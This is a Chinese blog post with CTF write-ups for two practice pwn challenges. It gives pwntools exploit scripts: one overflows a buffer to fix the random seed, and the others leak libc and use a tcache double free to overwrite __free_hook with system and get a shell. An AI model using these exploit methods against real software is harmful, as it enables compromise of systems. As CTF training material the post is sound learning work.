qctf_2018_dice_game,xm_2019_awd_pwn2

已于 2022-09-23 11:03:32 修改
阅读量198 收藏
点赞数
分类专栏: PWN 文章标签: pwn
于 2022-09-20 16:24:30 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_51251108/article/details/126955874
版权

qctf_2018_dice_game

溢出,控制seed值,使伪随机为固定值

#include <stdlib.h>
#include <stdio.h>
#define MAX 50
int main( void)
{
int number[MAX] = {0};
int i;
srand(0); /*播种子*/
for(i = 0; i < MAX; i++){
number[i] = rand() % 6; 
printf("'%d',", number[i]+1);
}
printf("\n");
return 0;

}

from pwn import*
#r=process('./QCTF_2018_dice_game')
r=remote('node4.buuoj.cn',29426)
r.sendline('a'*0x40+p64(0))
a=['2','5','4','2','6','2','5','1','4','2','3','2','3','2','6','5','1','1','5','5','6','3','4','4','3','3','3','2','2','2','6','1','1','1','6','4','2','5','2','5','4','4','4','6','3','2','3','3','6','1']
for i in range(50):
    r.recvuntil('Give me the point(1~6): ')
    r.sendline(a[i])
r.interactive()

xm_2019_awd_pwn2

这题限制最多创建18个堆,libc2.27加了doublefree检测的话,用fastbin_attack,就差一个堆就可以做出来,(不知是不是awd,被修过)而buu的远端是老版本没有doublefree检测,用tcache doublefree就可以解出

from pwn import *
from LibcSearcher import * 
local_file  = './xm_2019_awd_pwn2'
local_libc  = './libc-2.27.so'
remote_libc = './libc-2.27.so'
#remote_libc = '/home/glibc-all-in-one/libs/buu/libc-2.23.so'
select = 0
if select == 0:
    r = process(local_file)
    libc = ELF(local_libc)
else:
    r = remote('', )
    libc = ELF(remote_libc)
elf = ELF(local_file)
context.log_level = 'debug'
context.arch = elf.arch
se      = lambda data               :r.send(data) 
sa      = lambda delim,data         :r.sendafter(delim, data)
sl      = lambda data               :r.sendline(data)
sla     = lambda delim,data         :r.sendlineafter(delim, data)
sea     = lambda delim,data         :r.sendafter(delim, data)
rc      = lambda numb=4096          :r.recv(numb)
rl      = lambda                    :r.recvline()
ru      = lambda delims          :r.recvuntil(delims)
uu32    = lambda data               :u32(data.ljust(4, '\0'))
uu64    = lambda data               :u64(data.ljust(8, '\0'))
info    = lambda tag, addr        :r.info(tag + ': {:#x}'.format(addr))
def debug(cmd=''):
     gdb.attach(r,cmd)
#---------------------
def add(size,content):
    sla('>>','1')
    sla('size:',str(size))
    sla('content:',content)
def free(index):
    sla('>>','2')
    sla('idx',str(index))
def show(index):
    sla('>>','3')
    sla('idx',str(index))
#-------------------
add(0x410,'pppp')#0
add(0x68,'aaaa')#1
free(0)
show(0)
malloc_hook=uu64(ru('\x7f')[-6:])-96-0x10
libc_base=malloc_hook-libc.sym['__malloc_hook']
print hex(libc_base)
free_hook=libc_base+libc.sym['__free_hook']
system=libc_base+libc.sym['system']
#------------------------
for i in range(7):
    add(0x68,'a'*0x60)#8
add(0x68,'')#9
for i in range(7):
    free(i+1)
free(8)
free(9)
free(8)
for i in range(7):
    add(0x68,'aaaa')#15
add(0x68,p64(malloc_hook-0x23))#16
add(0x68,'')#17
add(0x68,'')#18
#add(0x68,'失败')#19
debug()

r.interactive()

from pwn import *
from LibcSearcher import * 
local_file  = './xm_2019_awd_pwn2'
local_libc  = './libc-2.27.so'
remote_libc = './libc-2.27.so'
#remote_libc = '/home/glibc-all-in-one/libs/buu/libc-2.23.so'
select = 1
if select == 0:
    r = process(local_file)
    libc = ELF(local_libc)
else:
    r = remote('node4.buuoj.cn',25368 )
    libc = ELF(remote_libc)
elf = ELF(local_file)
context.log_level = 'debug'
context.arch = elf.arch
se      = lambda data               :r.send(data) 
sa      = lambda delim,data         :r.sendafter(delim, data)
sl      = lambda data               :r.sendline(data)
sla     = lambda delim,data         :r.sendlineafter(delim, data)
sea     = lambda delim,data         :r.sendafter(delim, data)
rc      = lambda numb=4096          :r.recv(numb)
rl      = lambda                    :r.recvline()
ru      = lambda delims          :r.recvuntil(delims)
uu32    = lambda data               :u32(data.ljust(4, '\0'))
uu64    = lambda data               :u64(data.ljust(8, '\0'))
info    = lambda tag, addr        :r.info(tag + ': {:#x}'.format(addr))
def debug(cmd=''):
     gdb.attach(r,cmd)
#---------------------
def add(size,content):
    sla('>>','1')
    sla('size:',str(size))
    sla('content:',content)
def free(index):
    sla('>>','2')
    sla('idx',str(index))
def show(index):
    sla('>>','3')
    sla('idx',str(index))
#-------------------
add(0x410,'pppp')#0
add(0x68,'aaaa')#1
free(0)
show(0)
malloc_hook=uu64(ru('\x7f')[-6:])-96-0x10
libc_base=malloc_hook-libc.sym['__malloc_hook']
print hex(libc_base)
free_hook=libc_base+libc.sym['__free_hook']
system=libc_base+libc.sym['system']
#------------------------
add(0x10,'')
add(0x10,'/bin/sh\x00')
free(2)
free(2)
add(0x10,p64(free_hook))
add(0x10,'')
add(0x10,p64(system))
free(3)
r.interactive()
Nq0inaen
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
awd的批量脚本 pwn_Luz pwn题目批量部署脚本(一题一容器)
weixin_39861920的博客
12-20 524
一题一个docker,优点是便于单个题目的维护,缺点比较占用资源多题目部署在一个docker的见这里,但是为了避免权限过高带来的跨题目读取flag等问题,这个大佬锁死了可执行的命令,以至于部分题目直接使用"cat flag"等命令直接报错#coding:utf-8#by:Luzimportosimportsysimportrandomimporttimedefcreatflag()...
【2020安洵杯线下赛】AWD的第一道pwn
古月浪子的博客
12-18 2404
题目是一个简易代码执行器 按照以前的此类题型的经验试了一下,通过指针任意读写的方法好像用不了(不知道是不是我菜了-_- 可以看到一个ev函数,我们在sub_21B4函数中找到它的实现 可以发现我们能echo4个字符,如果让拼接的字符串变成echo 0;sh即可拿到shell 写脚本打全场: #!/usr/bin/python3 from pwn import * from LibcSearcher import * import requests def submit_flag(flag):
BUUCTF bbys_tu_2016&&xm_2019_awd_pwn2
doudoudedi
01-23 1028
在家希望武汉的师傅们一切都好~~ bbys_tu_2016 这道有点没搞清额额flag文件是flag.txt是能control但是好像不能ROP也是能读到flag文件的就很简单了还有似乎文件没写好setbuf函数不会先出现io流 exp: #!/usr/bin/python2 from pwn import * local=0 if local==1: p=process('../binary/...
AWDPWN题流量捕获和反打实验
最新发布
m0_52249553的博客
05-09 1581
这里用一个vps模拟被攻击的远程主机,并在其上面用tcpdump监听pwn题所在的端口,然后根据攻击流量,编写exp脚本复现攻击。
Bugku S3 AWD排位赛-4 pwn
z1r0的博客
09-10 908
设计的还有点有缺陷的,web和pwn都用的一个环境,web可以直接拿到pwn的flag(cat /home/ctf/flag),导致了web手能直接拿双倍的分(web+pwn),分两个环境就可以解决问题了。修起来也简单,直接把下面的fgets的64改成16就可以了,再提一嘴,pwn patch好了之后覆盖了原来的pwn会出现pwn运行不起来的情况:(,就出现了web+pwn双宕机。吐槽一下,好几个战队什么都没干的突然飞到前10,一轮开始几秒之后一个队直接飞到8千多分,pwn打完一轮从第二轮就打不了了。
记一次bugku awd pwn题解4月19日
z1r0的博客
04-19 1354
记一次bugku awd pwn题解4月19日 在昨天还是前天的时候看到今天19:00有人开了一个awd房间,闲得没事就准备今天打着玩玩,结果前一个小时在玩忘记到了时间。。。。。 打开房间的时候发现时间已经过了一会了(XD 先连到端口看一下pwn的题目,很像个堆的题目,靶机上的libc是2.27-1.4的 看到保护什么都没有开的时候就猜到应该是写shellcode了。 这里可以内存泄露 这里可以通过buf来劫持heap_ptr这个指针。 接下来笔者还用到的一个地方就是这个释放功能 攻击思路: 因
qctf-school-2015:QCTF 学校 2015
06-06
QCTF 学校 2015 这是 QCTF School 2015 竞赛的开发库 - 面向学童的面对面 CTF 竞赛,由 Hackerdom 团队举办( )。 比赛于2015年5月10日举行。 QCTF校规可在大赛官网查看- 任务文件夹包含任务。 每个任务都在...
通过遗传优化的小波阈值滤波降低ECG信号的噪声
02-25
设计了二次曲线阈值函数(QCTF)来实现阈值点的平滑连接。 此外,针对均方根误差和滤波平滑度,设计了一种新的遗传算法来针对不同的噪声信号自动搜索QCFT的最优参数。 最后,通过MIT-BIH心律失常数据库ECG记录评估...
记一次bugku awdpwn
z1r0的博客
03-27 2134
今天闲得没事,随便逛逛的时候看到了bugku awd有战队开了房间,想着没什么事就报名玩了玩,不过pwn题还是很有意思的。 连上去发现是个堆题。。。再一看加固时间20分钟。。。。(瞬间无语住 直接在网上找题,结果发现网上都是2.23下的,这里笔者拿到的是2.27下的(再次瞬间无语住 没办法只好自己写exp了。拿到pwn附件就是一顿瞎分析,结果发现了upadte有堆溢出 再随便翻了翻发现还有一个uaf。 只不过没有show函数而已。 再看了一下保护 脑子里瞬间想好了攻击思路,申请到malloc_hoo
PwnWAF:用于AWDpwn日志工具
05-16
PWA文件 用于AWDpwn日志工具 描述 使用traceGen.py生成elf文件。 elf_name:我们要记录哪个elf文件 log_path:日志文件 计算机:此精灵的平台,(仅支持x86 / x86_64) 注意:elf_name和log_path必须是绝对路径 用法: python traceGen.py machine elf_name log_path 例如: python traceGen.py 64 /path/to/elf/test.bin /path/to/log/log.txt elf_name.out是日志文件,然后重命名该文件(或其他文件)以使xinetd引导该文件。 此文件将启动一个子进程以执行elf_name文件,并且父进程将记录信息: +-----+ |child| --> execute /path/to/elf/test.bin
网鼎杯2020半决赛awdplus题目
12-07
网鼎杯2020半决赛awd plus题目,包含pwn和web,解压密码在公告文本里。pwn ciri未开放无解压密码
[BUUCTF-pwn] xm_2019_awd_pwn1
weixin_52640415的博客
12-21 272
乍一看以为这题有多简单,直接给个溢出,还没有canary ssize_t vuln() { char buf[32]; // [rsp+0h] [rbp-20h] BYREF setbuf(stdin, buf); return read(0, buf, 0x100uLL); } 再一看就有点意思了: got表就两项 .got.plt:0000000000601000 _GLOBAL_OFFSET_TABLE_ dq offset _DYNAMIC .got.plt:0000000
nsctf_online_2019_pwn2
doudoudedi
01-31 765
思路 先是用leaklibc地址然后fastbin attack打malloc_hook即可 exp: #!/usr/bin/python2 from pwn import * local=1 if local==1: p=process('./nsct2019pwn2') elf=ELF('./nsct2019pwn2') libc=elf.libc else: p=remote('no...
buuoj Pwn writeup 221-225
yongbaoii的博客
08-31 885
221 starctf2018_babystack 222 xm_2019_awd_pwn2 223 jarvisoj_level6 224 hctf2018_the_end 225 inndy_onepunch
AWD学习
zb0567的专栏
09-14 1978
基本流程 1、拉下题目文件 2、迅速分析题目漏洞 3、将漏洞打上补丁回传 4、解题、攻击 5、抓流量、防御 一、靶机信息收集 PWN靶机、通过XSHELL连接,下载LIBC文件和ELF文件,下载完请备份 一般 nc ip + 端口 libc 一般在 lib/x86_64-linux-gnu 的libc-2.23.so文件 这个是运行时,所以要下载 创建一个比赛文件副本,将pwn和so文件拷贝进去 需要自己寻找pwn题目的端口,每个队伍pwn挂载端口都是相同的 nmap工具扫描一遍pw
AWD 一个RE手的PWN机防守有感
Air_cat的博客
12-12 1603
AWD 一个RE手的PWN机防守有感 ①遇到free,不要犹豫,直接patch,我再说一遍,直接patch,全patch,通通patch ②不要试图去干涉数值,除非你十分做好了check down的心理准备
ctf pwn 个人经验记录
jmp esp
05-22 8875
前言记录一下自己在做pwn的过程当中学到的一些东西,以前不知道的东西等等,碰到的坑也会记录在 这里,主要目的是帮助自己记录一下经验。其实每一道题基本上能学到的新东西是有限的,记录下来避免什么时候想不起来。顺序比较乱,基本上根据我做题的顺序定的,比较随意。pwnother place(not from ctf) 多用gdb调试,有思路可以先写出来调试一下看看效果再说 遇见pie考虑写malloc_h
攻防世界 newscenter
09-08
最后,通过执行以下SQL语句search=-1' union select 1,version(),group_concat(fl4g) from secret_table --,我们可以得到flag的值为QCTF{sq1_inJec7ion_ezzz}。这是一个CTF比赛中的一个关卡,攻防世界的NewsCenter...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值